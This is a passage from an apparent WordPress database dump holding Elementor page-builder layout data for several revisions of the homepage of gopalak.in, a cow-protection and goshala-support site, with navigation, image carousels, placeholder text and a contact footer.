a24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10390,1731,'_elementor_page_assets','a:0:{}'),(10392,1732,'_elementor_edit_mode','builder'),(10393,1732,'_elementor_template_type','wp-page'),(10394,1732,'_elementor_version','3.7.8'),(10395,1732,'_wp_page_template','elementor_canvas'),(10396,1732,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10397,1732,'_elementor_page_assets','a:0:{}'),(10400,1733,'_elementor_edit_mode','builder'),(10401,1733,'_elementor_template_type','wp-page'),(10402,1733,'_elementor_version','3.7.8'),(10403,1733,'_wp_page_template','elementor_canvas'),(10404,1733,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 